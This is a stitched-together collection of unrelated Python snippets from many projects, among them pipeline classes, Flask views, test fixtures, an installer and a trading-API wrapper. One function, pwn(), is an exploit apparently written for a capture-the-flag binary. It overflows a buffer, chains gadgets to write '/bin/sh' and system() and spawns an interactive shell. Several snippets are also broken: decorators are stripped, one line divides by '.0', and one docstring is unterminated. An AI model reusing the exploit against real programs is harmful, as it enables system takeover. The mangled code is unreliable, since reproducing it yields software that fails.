if (self.module_list[i].source_type != self.module_list[(i - 1)].target_type):
raise RuntimeError(f'{self.module_list[i]}.source_type({self.module_list[i].source_type}) != {self.pipeline[(i - 1)]}.target_type({self.pipeline[(i - 1)].target_type}')
def source_type(self) -> Optional[str]:
return self.module_list[0].source_type
def target_type(self) -> Optional[str]:
return self.module_list[(- 1)].target_type
def reset(self) -> None:
for module in self.module_list:
module.reset()
def build_states(self) -> List[AgentStates]:
return [module.build_states() for module in self.module_list]
def push(self, segment: Segment, states: Optional[List[Optional[AgentStates]]]=None, upstream_states: Optional[List[Optional[AgentStates]]]=None) -> None:
if (states is None):
states = [None for _ in self.module_list]
states_list = [module.states for module in self.module_list]
else:
assert (len(states) == len(self.module_list))
states_list = states
if (upstream_states is None):
upstream_states = []
for (index, module) in enumerate(self.module_list[:(- 1)]):
config = segment.config
segment = module.pushpop(segment, states[index], upstream_states=(upstream_states + states_list[:index]))
segment.config = config
self.module_list[(- 1)].push(segment, states[(- 1)], upstream_states=(upstream_states + states_list[:len(self.module_list[:(- 1)])]))
def pop(self, states: Optional[List[Optional[AgentStates]]]=None) -> Segment:
if (states is None):
last_states = None
else:
assert (len(states) == len(self.module_list))
last_states = states[(- 1)]
return self.module_list[(- 1)].pop(last_states)
def add_args(cls, parser) -> None:
for module_class in cls.pipeline:
module_class.add_args(parser)
def from_args(cls, args):
assert (len(cls.pipeline) > 0)
return cls([module_class.from_args(args) for module_class in cls.pipeline])
def __repr__(self) -> str:
pipline_str = '\n\t'.join(('\t'.join(str(module).splitlines(True)) for module in self.module_list))
return f'''{self.__class__.__name__}(
{pipline_str}
)'''
def __str__(self) -> str:
return self.__repr__() |
class TimeTreeTracer(Tracer):
def __init__(self, instance, verbosity=False, root_label='root', start_clocks=False, max_depth=1024):
Tracer.__init__(self, instance, verbosity, max_depth)
self.trace = Node(root_label)
self.current = self.trace
if start_clocks:
self.reenter()
def enter(self, label, **kwds):
self.current = self.current.child(label)
self.reenter()
def reenter(self, **kwds):
if (self.current is None):
self.current = self.trace
node = self.current
node.data['cputime'] = (node.data.get('cputime', 0) + Accumulator((- process_time()), repr='sum', count=False))
node.data['walltime'] = (node.data.get('walltime', 0) + Accumulator((- time.time()), repr='sum', count=False))
def exit(self, **kwds):
node = self.current
node.data['cputime'] += process_time()
node.data['walltime'] += time.time()
if (self.verbosity and (self.verbosity >= self.current.level)):
print(self.current)
self._pop() |
class Sensor(GenericSensor):
SENSOR_SCHEMA: CerberusSchemaType = {'pin_echo': {'type': 'integer', 'required': True, 'empty': False}, 'pin_trigger': {'type': 'integer', 'required': True, 'empty': False}, 'burst': {'type': 'integer', 'required': True, 'empty': False}}
def setup_module(self) -> None:
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
self.gpio = GPIO
self.sensors: Dict[(str, HCSR04)] = {}
def setup_sensor(self, sens_conf: ConfigType) -> None:
sensor = HCSR04(gpio=self.gpio, **sens_conf)
self.sensors[sensor.name] = sensor
def get_value(self, sens_conf: ConfigType) -> SensorValueType:
return self.sensors[sens_conf['name']].measure_range()
def cleanup(self) -> None:
self.gpio.cleanup() |
class EditGroup(MethodView):
decorators = [allows.requires(IsAdmin, on_fail=FlashAndRedirect(message=_('You are not allowed to modify groups.'), level='danger', endpoint='management.overview'))]
form = EditGroupForm
def get(self, group_id):
group = Group.query.filter_by(id=group_id).first_or_404()
form = self.form(group)
return render_template('management/group_form.html', form=form, title=_('Edit Group'))
def post(self, group_id):
group = Group.query.filter_by(id=group_id).first_or_404()
form = EditGroupForm(group)
if form.validate_on_submit():
form.populate_obj(group)
group.save()
if group.guest:
Guest.invalidate_cache()
flash(_('Group updated.'), 'success')
return redirect(url_for('management.groups', group_id=group.id))
return render_template('management/group_form.html', form=form, title=_('Edit Group')) |
def get_bug_traqs_lists_from_online_mode(bid_list):
items = set()
output_array = []
extended_info_array = []
for line in bid_list:
try:
json_data = json.loads(line)
parse_bid_from_json(json_data, items)
del json_data['vuln_products']
extended_info_array.append(json_data)
except (TypeError, ValueError):
pass
if (len(items) > 8000):
output_array.append(list(items))
items = set()
if (len(items) > 0):
output_array.append(list(items))
return (output_array, extended_info_array) |
def populate_broker_data(broker_server_dblink_setup):
broker_data = {'sam_recipient': json.loads(Path('usaspending_api/recipient/tests/data/broker_sam_recipient.json').read_text()), 'subaward': json.loads(Path('usaspending_api/awards/tests/data/subaward.json').read_text()), 'cd_state_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_state_grouped.json').read_text()), 'zips': json.loads(Path('usaspending_api/transactions/tests/data/zips.json').read_text()), 'cd_zips_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_zips_grouped.json').read_text()), 'cd_city_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_city_grouped.json').read_text()), 'cd_county_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_county_grouped.json').read_text())}
insert_statement = 'INSERT INTO %(table_name)s (%(columns)s) VALUES %(values)s'
with connections[settings.DATA_BROKER_DB_ALIAS].cursor() as cursor:
for (table_name, rows) in broker_data.items():
columns = list(rows[0])
values = [str(tuple(r.values())).replace('None', 'null') for r in rows]
sql_string = cursor.mogrify(insert_statement, {'table_name': AsIs(table_name), 'columns': AsIs(','.join(columns)), 'values': AsIs(','.join(values))})
cursor.execute(sql_string)
(yield)
with connections[settings.DATA_BROKER_DB_ALIAS].cursor() as cursor:
for table in broker_data:
cursor.execute(f'TRUNCATE TABLE {table} RESTART IDENTITY CASCADE') |
class ParallelBuildExt(*build_ext_classes):
def logger(self):
logger = get_logger(self.logger_name)
return logger
def initialize_options(self):
super().initialize_options()
self.logger_name = 'transonic'
self.num_jobs_env_var = ''
self.ignoreflags = ('-Wstrict-prototypes',)
self.ignoreflags_startswith = ('-axMIC_', '-diag-disable:')
def finalize_options(self):
if (self.parallel is None):
self.parallel = self.get_num_jobs()
super().finalize_options()
self.logger.debug(f'Parallel build enabled with {self.parallel} jobs')
self.logger.debug(f'Base classes: {build_ext_classes}')
def get_num_jobs(self):
try:
num_jobs = int(os.environ[self.num_jobs_env_var])
except KeyError:
import multiprocessing
num_jobs = multiprocessing.cpu_count()
try:
from psutil import virtual_memory
except ImportError:
self.logger.warning('psutil not available at build time. Cannot check memory available and potentially limit num_jobs.')
else:
avail_memory_in_Go = (virtual_memory().available / .0)
limit_num_jobs = max(1, round((avail_memory_in_Go / 3)))
if (num_jobs > limit_num_jobs):
self.logger.info(f'num_jobs limited by memory, fixed at {limit_num_jobs}')
num_jobs = min(num_jobs, limit_num_jobs)
return num_jobs
def build_extensions(self):
self.check_extensions_list(self.extensions)
for ext in self.extensions:
try:
ext.sources = self.cython_sources(ext.sources, ext)
except AttributeError:
pass
SetuptoolsBuildExt.build_extensions(self)
def _build_extensions_parallel(self):
logger = self.logger
if hasattr(self.compiler, 'compiler_so'):
self.compiler.compiler_so = [key for key in self.compiler.compiler_so if ((key not in self.ignoreflags) and all([(not key.startswith(s)) for s in self.ignoreflags_startswith]))]
ext_types = {type(ext) for ext in self.extensions}
extensions_by_type = {T: [] for T in ext_types}
for ext in self.extensions:
extensions_by_type[ext.__class__].append(ext)
def names(exts):
return [ext.name for ext in exts]
num_jobs = self.parallel
logger.info(f'_build_extensions_parallel with num_jobs = {num_jobs}')
for (type_ext, exts) in extensions_by_type.items():
logger.info(f'Building extensions of type {type_ext}: {names(exts)}')
with Pool(num_jobs) as pool:
pool.map(self.build_extension, exts)
logger.info(f'Extensions built: {names(exts)}') |
class TestBashOperator(unittest.TestCase):
def test_start_bash(self):
test_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), '.test_start_bash.test')
open(test_file, 'a').close()
self.assertTrue(os.path.isfile(test_file))
with Workflow(name='workflow') as workflow:
bash_operator = BashOperator(name='test_start_bash', bash_command='rm {}'.format(test_file))
bash_operator.start(context={})
bash_operator.await_termination(context={})
self.assertEqual(1, len(workflow.tasks))
self.assertFalse(os.path.isfile(test_file))
def test_non_zero_exit_code(self):
with Workflow(name='workflow'):
bash_operator = BashOperator(name='test_non_zero_exit_code', bash_command='exit 2')
with self.assertRaisesRegex(AIFlowException, 'Bash command failed\\. The command returned a non-zero exit code\\.'):
bash_operator.start(context={})
bash_operator.await_termination(context={})
def test_stop(self):
self.bash_operator = None
def bash_op():
with Workflow(name='workflow'):
self.bash_operator = BashOperator(name='test_stop', bash_command='sleep 10')
self.bash_operator.start(context={})
_thread = threading.Thread(target=bash_op, daemon=True)
_thread.start()
time.sleep(0.1)
self.bash_operator.stop(context={})
time.sleep(0.1)
with self.assertRaises(psutil.NoSuchProcess):
psutil.Process(self.bash_operator.sub_process.pid)
def test_await_termination(self):
self.bash_operator = None
with Workflow(name='workflow'):
self.bash_operator = BashOperator(name='test_await_termination', bash_command='sleep 1')
self.bash_operator.start(context={})
with self.assertRaises(TimeoutExpired):
time.sleep(0.1)
self.bash_operator.await_termination(context={}, timeout=0.1)
def test_pickle(self):
with Workflow(name='workflow') as workflow:
self.bash_operator = BashOperator(name='test_pickle', bash_command='sleep 1')
self.assertIsNotNone(cloudpickle.dumps(workflow)) |
class HomeWindow():
def __init__(self):
self.id_string = 'plugin.video.embycon-%s'
self.window = xbmcgui.Window(10000)
def get_property(self, key):
key = (self.id_string % key)
value = self.window.getProperty(key)
return value
def set_property(self, key, value):
key = (self.id_string % key)
self.window.setProperty(key, value)
def clear_property(self, key):
key = (self.id_string % key)
self.window.clearProperty(key) |
class Auth(object):
def __init__(self):
self.hosts_yml = os.path.join(str(Path.home()), '.config', 'gh', 'hosts.yml')
if os.path.exists(self.hosts_yml):
with open(self.hosts_yml, 'r') as f:
self.hosts = yaml.safe_load(f)
else:
self.hosts = None
self.hostname = HOSTNAME
self.secret_repo = SECRET_REPO
def login(self):
pass
def logout(self):
pass
def status(self):
if (self.hosts is None):
return None
else:
return self.hosts[self.hostname]
def user(self):
if (self.hosts is None):
return None
else:
return self.hosts[self.hostname]['user']
def oauth_token(self):
if (self.hosts is None):
return None
else:
return self.hosts[self.hostname]['oauth_token']
def is_contributor(self):
if (Github is None):
return False
else:
gh = Github(login_or_token=self.oauth_token())
try:
repo = gh.get_repo(self.secret_repo)
if (repo is None):
return False
else:
return True
except UnknownObjectException:
return False |
def _get_prescribing_for_codes(db, bnf_code_prefixes):
if bnf_code_prefixes:
where_clause = ' OR '.join((['bnf_code LIKE ?'] * len(bnf_code_prefixes)))
params = [(code + '%') for code in bnf_code_prefixes]
sql = '\n SELECT\n matrix_sum(items) AS items,\n matrix_sum(quantity) AS quantity,\n matrix_sum(actual_cost) AS actual_cost\n FROM\n presentation\n WHERE\n {}\n '.format(where_clause)
else:
sql = 'SELECT items, quantity, actual_cost FROM all_presentations'
params = []
(items, quantity, actual_cost) = db.query_one(sql, params)
if (actual_cost is not None):
actual_cost = (actual_cost / 100.0)
return (items, quantity, actual_cost) |
class OptionSeriesTilemapSonificationTracksMappingTremolo(Options):
def depth(self) -> 'OptionSeriesTilemapSonificationTracksMappingTremoloDepth':
return self._config_sub_data('depth', OptionSeriesTilemapSonificationTracksMappingTremoloDepth)
def speed(self) -> 'OptionSeriesTilemapSonificationTracksMappingTremoloSpeed':
return self._config_sub_data('speed', OptionSeriesTilemapSonificationTracksMappingTremoloSpeed) |
def _filter_constant_calls(calls: List[ast.Call]) -> List[ast.Call]:
def _is_constant(arg: ast.expr):
import sys
if (sys.version_info < (3, 8)):
return isinstance(arg, ast.Str)
else:
return isinstance(arg, ast.Constant)
return [call for call in calls if all(map(_is_constant, call.args))] |
def test_that_run_workflow_component_enabled_when_workflows(qapp, tmp_path):
config_file = (tmp_path / 'config.ert')
with open(config_file, 'a+', encoding='utf-8') as ert_file:
ert_file.write('NUM_REALIZATIONS 1\n')
ert_file.write('LOAD_WORKFLOW_JOB workflows/UBER_PRINT print_uber\n')
ert_file.write('LOAD_WORKFLOW workflows/MAGIC_PRINT magic_print\n')
os.mkdir((tmp_path / 'workflows'))
with open((tmp_path / 'workflows/MAGIC_PRINT'), 'w', encoding='utf-8') as f:
f.write('print_uber\n')
with open((tmp_path / 'workflows/UBER_PRINT'), 'w', encoding='utf-8') as f:
f.write('EXECUTABLE ls\n')
args = Mock()
args.config = str(config_file)
with add_gui_log_handler() as log_handler:
(gui, *_) = ert.gui.main._start_initial_gui_window(args, log_handler)
assert (gui.windowTitle() == 'ERT - config.ert')
run_workflow_button = gui.tools['Run workflow']
assert run_workflow_button.isEnabled() |
def _to_notations(pitch: Pitch) -> List[str]:
notations = []
pitch_class = (pitch % 12)
octave = ((pitch // 12) - 1)
for alter in range((- 2), 3):
pc = (pitch_class - alter)
if (pc < 0):
o = (octave - 1)
elif (pc > 11):
o = (octave + 1)
else:
o = octave
try:
i = [0, 2, 4, 5, 7, 9, 11].index((pc % 12))
except:
continue
step = ['C', 'D', 'E', 'F', 'G', 'A', 'B'][i]
acci = {0: '', 1: '#', 2: '##', (- 1): '-', (- 2): '--'}[alter]
notation = ((step + acci) + str(o))
notations.append(notation)
return notations |
def pwn():
payload = ('A' * (64 + 8))
payload += com_gadget(part1, part2, elf.got['read'], 0, binsh_addr, 8)
payload += p64(_start_addr)
payload = payload.ljust(200, 'A')
io.send(payload)
io.sendafter('bye~\n', '/bin/sh\x00')
payload = ('A' * (64 + 8))
payload += com_gadget(part1, part2, elf.got['read'], 0, system_ptr, 8)
payload += p64(_start_addr)
payload = payload.ljust(200, 'A')
io.send(payload)
io.sendafter('bye~\n', p64(system_addr))
payload = ('A' * (64 + 8))
payload += com_gadget(part1, part2, system_ptr, binsh_addr)
payload = payload.ljust(200, 'A')
io.send(payload)
io.interactive() |
class OptionSeriesAreaSonificationTracksMappingHighpass(Options):
def frequency(self) -> 'OptionSeriesAreaSonificationTracksMappingHighpassFrequency':
return self._config_sub_data('frequency', OptionSeriesAreaSonificationTracksMappingHighpassFrequency)
def resonance(self) -> 'OptionSeriesAreaSonificationTracksMappingHighpassResonance':
return self._config_sub_data('resonance', OptionSeriesAreaSonificationTracksMappingHighpassResonance) |
(scope='function')
def saas_external_example_connection_config(db: Session, saas_external_example_config: Dict[(str, Any)], saas_example_secrets: Dict[(str, Any)]) -> Generator:
fides_key = saas_external_example_config['fides_key']
connection_config = ConnectionConfig.create(db=db, data={'key': fides_key, 'name': fides_key, 'connection_type': ConnectionType.saas, 'access': AccessLevel.write, 'secrets': saas_example_secrets, 'saas_config': saas_external_example_config})
(yield connection_config)
connection_config.delete(db) |
def test_default_value_missing():
'
schema = {'type': 'record', 'name': 'test_default_value_missing', 'fields': [{'name': 'string', 'type': 'string'}]}
record = {}
new_file = StringIO(json.dumps(record))
with pytest.raises(ValueError, match='no value and no default'):
next(json_reader(new_file, schema)) |
def split_simple_multistream_parallel_ops(ops_by_order, max_parallel_ops: int):
assert (max_parallel_ops > 0)
output = []
execution_orders = sorted(ops_by_order.keys())
for execution_order in execution_orders:
ops = ops_by_order[execution_order]
ops_parallel = []
for op in ops:
ops_parallel.append(op)
if (len(ops_parallel) >= max_parallel_ops):
output.append(ops_parallel)
ops_parallel = []
if (len(ops_parallel) > 0):
output.append(ops_parallel)
return output |
def to_action(dic, ofp, parser, action_type, util):
actions = {COPY_TTL_OUT: parser.OFPActionCopyTtlOut, COPY_TTL_IN: parser.OFPActionCopyTtlIn, DEC_MPLS_TTL: parser.OFPActionDecMplsTtl, POP_VLAN: parser.OFPActionPopVlan, DEC_NW_TTL: parser.OFPActionDecNwTtl}
if (ofp.OFP_VERSION > ofproto_v1_2.OFP_VERSION):
actions[POP_PBB] = parser.OFPActionPopPbb
need_ethertype = {PUSH_VLAN: parser.OFPActionPushVlan, PUSH_MPLS: parser.OFPActionPushMpls, POP_MPLS: parser.OFPActionPopMpls}
if (ofp.OFP_VERSION > ofproto_v1_2.OFP_VERSION):
need_ethertype[PUSH_PBB] = parser.OFPActionPushPbb
if (action_type in actions):
return actions[action_type]()
elif (action_type in need_ethertype):
ethertype = str_to_int(dic.get('ethertype'))
return need_ethertype[action_type](ethertype)
elif (action_type == OUTPUT):
out_port = util.ofp_port_from_user(dic.get('port', ofp.OFPP_ANY))
max_len = util.ofp_cml_from_user(dic.get('max_len', ofp.OFPCML_MAX))
return parser.OFPActionOutput(out_port, max_len)
elif (action_type == SET_MPLS_TTL):
mpls_ttl = str_to_int(dic.get('mpls_ttl'))
return parser.OFPActionSetMplsTtl(mpls_ttl)
elif (action_type == SET_QUEUE):
queue_id = util.ofp_queue_from_user(dic.get('queue_id'))
return parser.OFPActionSetQueue(queue_id)
elif (action_type == GROUP):
group_id = util.ofp_group_from_user(dic.get('group_id'))
return parser.OFPActionGroup(group_id)
elif (action_type == SET_NW_TTL):
nw_ttl = str_to_int(dic.get('nw_ttl'))
return parser.OFPActionSetNwTtl(nw_ttl)
elif (action_type == SET_FIELD):
field = dic.get('field')
value = dic.get('value')
return parser.OFPActionSetField(**{field: value})
elif (action_type == 'COPY_FIELD'):
n_bits = str_to_int(dic.get('n_bits'))
src_offset = str_to_int(dic.get('src_offset'))
dst_offset = str_to_int(dic.get('dst_offset'))
oxm_ids = [parser.OFPOxmId(str(dic.get('src_oxm_id'))), parser.OFPOxmId(str(dic.get('dst_oxm_id')))]
return parser.OFPActionCopyField(n_bits, src_offset, dst_offset, oxm_ids)
elif (action_type == 'METER'):
if hasattr(parser, 'OFPActionMeter'):
meter_id = str_to_int(dic.get('meter_id'))
return parser.OFPActionMeter(meter_id)
else:
return None
elif (action_type == EXPERIMENTER):
experimenter = str_to_int(dic.get('experimenter'))
data_type = dic.get('data_type', 'ascii')
if (data_type not in ('ascii', 'base64')):
LOG.error('Unknown data type: %s', data_type)
return None
data = dic.get('data', '')
if (data_type == 'base64'):
data = base64.b64decode(data)
return parser.OFPActionExperimenterUnknown(experimenter, data)
return None |
class Installer(BaseInstaller):
def __init__(self, check_install_log=True, config_json=None, credentials_json=None):
BaseInstaller.__init__(self, check_install_log=check_install_log, config_json=config_json, credentials_json=credentials_json)
def profile(self):
if self._is_done('profile'):
return
from ..default import bashrc_cli_snippet
click.echo(">> Setting up 'ersilia' CLI in user profile")
bashrc_cli_snippet()
def conda(self):
if self._is_done('conda'):
return
if self._is_tool('conda'):
return
click.echo('Conda needs to be installed')
sys.exit(1)
def git(self):
if self._is_done('git'):
return
if self._is_tool('git'):
return
click.echo('Git needs to be installed')
sys.exit(1)
def rdkit(self):
if self._is_done('rdkit'):
return
try:
import rdkit
exists = True
except ModuleNotFoundError:
exists = False
if exists:
return
click.echo('>> Installing RDKit from Conda')
run_command('conda install -c conda-forge -y -q rdkit')
def config(self):
if self._is_done('config'):
return
if os.path.exists(os.path.join(EOS, CONFIG_JSON)):
return
click.echo('>> Setting up Config file')
checker = Checker()
checker.config()
def _clone_repo(self, path):
path_repo = os.path.join(path, self.cfg.HUB.PACKAGE)
dev_path = self.development_path
if (dev_path is not None):
shutil.copytree(dev_path, path_repo)
else:
from .download import GitHubDownloader
gd = GitHubDownloader(overwrite=True)
gd.clone(self.cfg.HUB.ORG, self.cfg.HUB.PACKAGE, path_repo)
return path_repo
def base_conda(self):
if self._is_done('base_conda'):
return
eos_base_env = self.versions.base_conda_name()
sc = SimpleConda()
if sc.exists(eos_base_env):
return
tmp_folder = tempfile.mkdtemp(prefix='ersilia-')
tmp_repo = self._clone_repo(tmp_folder)
tmp_script = os.path.join(tmp_folder, 'script.sh')
tmp_python_script = os.path.join(tmp_folder, 'base_installer.py')
is_base = sc.is_base()
if (not is_base):
bash_script = '\n source {0}/etc/profile.d/conda.sh\n conda deactivate\n '.format(sc.conda_prefix(False))
else:
bash_script = ''
bash_script += '\n source {0}/etc/profile.d/conda.sh\n '.format(sc.conda_prefix(True))
bc = SetupBaseConda()
python_version = self.versions.python_version()
python_version = bc.find_closest_python_version(python_version)
bash_script += '\n cd {0}\n conda create -n {1} python={2} -y\n conda activate {1}\n pip install -e .\n python {3}\n conda deactivate\n '.format(tmp_repo, eos_base_env, python_version, tmp_python_script)
with open(tmp_script, 'w') as f:
f.write(bash_script)
python_script = '\n from ersilia.utils.installers import base_installer\n base_installer(ignore_status=True)\n '
with open(tmp_python_script, 'w') as f:
lines = python_script.split('\n')
for l in lines:
f.write((l[8:] + '\n'))
click.echo('>> Creating a Base Conda environment {0}'.format(eos_base_env))
run_command('bash {0}'.format(tmp_script))
def base_conda_slim(self):
if self._is_done('base_conda_slim'):
return
def server_docker(self):
if self._is_done('server_docker'):
return
import tempfile
from .docker import SimpleDocker
docker = SimpleDocker()
(org, img, tag) = self.versions.server_docker_name(as_tuple=True)
if docker.exists(org, img, tag):
return
tmp_dir = tempfile.mkdtemp(prefix='ersilia-')
tmp_repo = self._clone_repo(tmp_dir)
dockerfile = '\n FROM bentoml/model-server:{0}-{1}\n MAINTAINER ersilia\n\n ENV LC_ALL=C.UTF-8\n ENV LANG=C.UTF-8\n\n WORKDIR {2}\n\n COPY . .\n\n RUN conda --version\n\n RUN pip install .\n RUN ersilia setup --base\n '.format(self.versions.bentoml_version(), self.versions.python_version(py_format=True), self.cfg.ENV.DOCKER.IMAGE_WORKDIR)
path = os.path.join(tmp_repo, 'Dockerfile')
with open(path, 'w') as f:
lines = dockerfile.split('\n')
lines = lines[1:(- 1)]
for l in lines:
f.write((l[8:] + '\n'))
click.echo('>> Building docker server image {0}'.format(self.versions.server_docker_name(as_tuple=False)))
docker.build(path=tmp_repo, org=org, img=img, tag=tag)
def server_docker_slim(self):
if self._is_done('server_docker_slim'):
return |
def test_service_create(service: Service, default_entity_dict):
entity: ServerResponse = service.create(ServeRequest(**default_entity_dict))
with db.session() as session:
db_entity: ServeEntity = session.get(ServeEntity, entity.id)
assert (db_entity.id == entity.id)
assert (db_entity.chat_scene == 'chat_data')
assert (db_entity.sub_chat_scene == 'excel')
assert (db_entity.prompt_type == 'common')
assert (db_entity.prompt_name == 'my_prompt_1')
assert (db_entity.content == 'Write a qsort function in python.')
assert (db_entity.user_name == 'zhangsan')
assert (db_entity.sys_code == 'dbgpt')
assert (db_entity.gmt_created is not None)
assert (db_entity.gmt_modified is not None) |
class Migration(migrations.Migration):
dependencies = [('admin_interface', '0024_remove_theme_css')]
operations = [migrations.AddField(model_name='theme', name='language_chooser_control', field=models.CharField(choices=[('default-select', 'Default Select'), ('minimal-select', 'Minimal Select')], default='default-select', max_length=20, verbose_name='control'))] |
.parametrize('remote_caps,local_caps,expected', (((A1,), (A1,), (A1,)), ((B1,), (B1,), (B1,)), ((A1, B1), (A1, B1), (A1, B1)), ((A1, B1), (B1, A1), (A1, B1)), ((B1, A1), (A1, B1), (A1, B1)), ((B1, A1), (B1, A1), (A1, B1)), ((A1, A2), (A2,), (A2,)), ((A1, A2), (A1,), (A1,)), ((A1,), (A1, A2), (A1,)), ((A2,), (A1, A2), (A2,)), ((A1, B1, A2, B2), (A1, B1, A2, B2), (A2, B2)), ((A1, B1, A2, B2), (A1, B1, A2), (A2, B1)), ((A1, B1, B2), (A1, B1, A2, B2), (A1, B2)), ((A1, B1, A2, B2), (A1, A2), (A2,)), ((A1, B1, B2), (A1, A2), (A1,)), ((A1,), (A2,), ()), ((A2,), (A1,), ()), ((B1,), (A1,), ()), ((B1, A1), (B2, A2), ()), ((B1, B2), (A1, A2), ()), ((A1, B1, B2), (A2,), ())))
def test_select_p2p_capabiltiies(remote_caps, local_caps, expected):
actual = _select_capabilities(remote_caps, local_caps)
assert (actual == expected) |
.compilertest
def test_mapping_host_authority_and_host():
test_yaml = '\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nmetadata:\n name: good-host-mapping\n namespace: default\nspec:\n headers:\n ":authority": bar.example.com\n host: foo.example.com\n prefix: /wanted_group/\n service: star\n'
r = compile_with_cachecheck(test_yaml, errors_ok=True)
ir = r['ir']
errors = ir.aconf.errors
assert (len(errors) == 0), ('Expected no errors but got %s' % json.dumps(errors, sort_keys=True, indent=4))
found = 0
for g in ir.groups.values():
if (g.prefix == '/wanted_group/'):
assert (g.host == 'foo.example.com')
found += 1
assert (found == 1), ('Expected 1 /wanted_group/ prefix, got %d' % found) |
class ParametrizingString(text_type):
def __new__(cls, formatting, normal=None):
new = text_type.__new__(cls, formatting)
new._normal = normal
return new
def __call__(self, *args):
try:
parametrized = tparm(self.encode('latin1'), *args).decode('latin1')
return (parametrized if (self._normal is None) else FormattingString(parametrized, self._normal))
except curses.error:
return u''
except TypeError:
if ((len(args) == 1) and isinstance(args[0], string_types)):
raise TypeError(('A native or nonexistent capability template received %r when it was expecting ints. You probably misspelled a formatting call like bright_red_on_white(...).' % args))
else:
raise |
(PRIVACY_REQUEST_MANUAL_WEBHOOK_ERASURE_INPUT, status_code=HTTP_200_OK, dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_UPLOAD_DATA])], response_model=None)
def upload_manual_webhook_erasure_data(*, connection_config: ConnectionConfig=Depends(_get_connection_config), privacy_request_id: str, db: Session=Depends(deps.get_db), input_data: Dict[(str, Any)]) -> None:
_handle_manual_webhook_input(action='erasure', connection_config=connection_config, privacy_request_id=privacy_request_id, db=db, input_data=input_data) |
class Wrapper():
ib: 'IB'
accountValues: Dict[(tuple, AccountValue)]
acctSummary: Dict[(tuple, AccountValue)]
portfolio: Dict[(str, Dict[(int, PortfolioItem)])]
positions: Dict[(str, Dict[(int, Position)])]
trades: Dict[(OrderKeyType, Trade)]
permId2Trade: Dict[(int, Trade)]
fills: Dict[(str, Fill)]
newsTicks: List[NewsTick]
msgId2NewsBulletin: Dict[(int, NewsBulletin)]
tickers: Dict[(int, Ticker)]
pendingTickers: Set[Ticker]
reqId2Ticker: Dict[(int, Ticker)]
ticker2ReqId: Dict[(Union[(int, str)], Dict[(Ticker, int)])]
reqId2Subscriber: Dict[(int, Any)]
reqId2PnL: Dict[(int, PnL)]
reqId2PnlSingle: Dict[(int, PnLSingle)]
pnlKey2ReqId: Dict[(tuple, int)]
pnlSingleKey2ReqId: Dict[(tuple, int)]
lastTime: datetime
accounts: List[str]
clientId: int
wshMetaReqId: int
wshEventReqId: int
_reqId2Contract: Dict[(int, Contract)]
_timeout: float
_futures: Dict[(Any, asyncio.Future)]
_results: Dict[(Any, Any)]
_logger: logging.Logger
_timeoutHandle: Union[(asyncio.TimerHandle, None)]
def __init__(self, ib: 'IB'):
self.ib = ib
self._logger = logging.getLogger('ib_insync.wrapper')
self._timeoutHandle = None
self.reset()
def reset(self):
self.accountValues = {}
self.acctSummary = {}
self.portfolio = defaultdict(dict)
self.positions = defaultdict(dict)
self.trades = {}
self.permId2Trade = {}
self.fills = {}
self.newsTicks = []
self.msgId2NewsBulletin = {}
self.tickers = {}
self.pendingTickers = set()
self.reqId2Ticker = {}
self.ticker2ReqId = defaultdict(dict)
self.reqId2Subscriber = {}
self.reqId2PnL = {}
self.reqId2PnlSingle = {}
self.pnlKey2ReqId = {}
self.pnlSingleKey2ReqId = {}
self.lastTime = datetime.min
self.accounts = []
self.clientId = (- 1)
self.wshMetaReqId = 0
self.wshEventReqId = 0
self._reqId2Contract = {}
self._timeout = 0
self._futures = {}
self._results = {}
self.setTimeout(0)
def setEventsDone(self):
events = [ticker.updateEvent for ticker in self.tickers.values()]
events += [sub.updateEvent for sub in self.reqId2Subscriber.values()]
for trade in self.trades.values():
events += [trade.statusEvent, trade.modifyEvent, trade.fillEvent, trade.filledEvent, trade.commissionReportEvent, trade.cancelEvent, trade.cancelledEvent]
for event in events:
event.set_done()
def connectionClosed(self):
error = ConnectionError('Socket disconnect')
for future in self._futures.values():
if (not future.done()):
future.set_exception(error)
globalErrorEvent.emit(error)
self.reset()
def startReq(self, key, contract=None, container=None):
future: asyncio.Future = asyncio.Future()
self._futures[key] = future
self._results[key] = (container if (container is not None) else [])
if contract:
self._reqId2Contract[key] = contract
return future
def _endReq(self, key, result=None, success=True):
future = self._futures.pop(key, None)
self._reqId2Contract.pop(key, None)
if future:
if (result is None):
result = self._results.pop(key, [])
if (not future.done()):
if success:
future.set_result(result)
else:
future.set_exception(result)
def startTicker(self, reqId: int, contract: Contract, tickType: Union[(int, str)]):
ticker = self.tickers.get(id(contract))
if (not ticker):
ticker = Ticker(contract=contract, ticks=[], tickByTicks=[], domBids=[], domAsks=[], domTicks=[])
self.tickers[id(contract)] = ticker
self.reqId2Ticker[reqId] = ticker
self._reqId2Contract[reqId] = contract
self.ticker2ReqId[tickType][ticker] = reqId
return ticker
def endTicker(self, ticker: Ticker, tickType: Union[(int, str)]):
reqId = self.ticker2ReqId[tickType].pop(ticker, 0)
self._reqId2Contract.pop(reqId, None)
return reqId
def startSubscription(self, reqId, subscriber, contract=None):
self._reqId2Contract[reqId] = contract
self.reqId2Subscriber[reqId] = subscriber
def endSubscription(self, subscriber):
self._reqId2Contract.pop(subscriber.reqId, None)
self.reqId2Subscriber.pop(subscriber.reqId, None)
def orderKey(self, clientId: int, orderId: int, permId: int) -> OrderKeyType:
key: OrderKeyType
if (orderId <= 0):
key = permId
else:
key = (clientId, orderId)
return key
def setTimeout(self, timeout: float):
self.lastTime = datetime.now(timezone.utc)
if self._timeoutHandle:
self._timeoutHandle.cancel()
self._timeoutHandle = None
self._timeout = timeout
if timeout:
self._setTimer(timeout)
def _setTimer(self, delay: float=0):
if (self.lastTime == datetime.min):
return
now = datetime.now(timezone.utc)
diff = (now - self.lastTime).total_seconds()
if (not delay):
delay = (self._timeout - diff)
if (delay > 0):
loop = getLoop()
self._timeoutHandle = loop.call_later(delay, self._setTimer)
else:
self._logger.debug('Timeout')
self.setTimeout(0)
self.ib.timeoutEvent.emit(diff)
def connectAck(self):
pass
def nextValidId(self, reqId: int):
pass
def managedAccounts(self, accountsList: str):
self.accounts = [a for a in accountsList.split(',') if a]
def updateAccountTime(self, timestamp: str):
pass
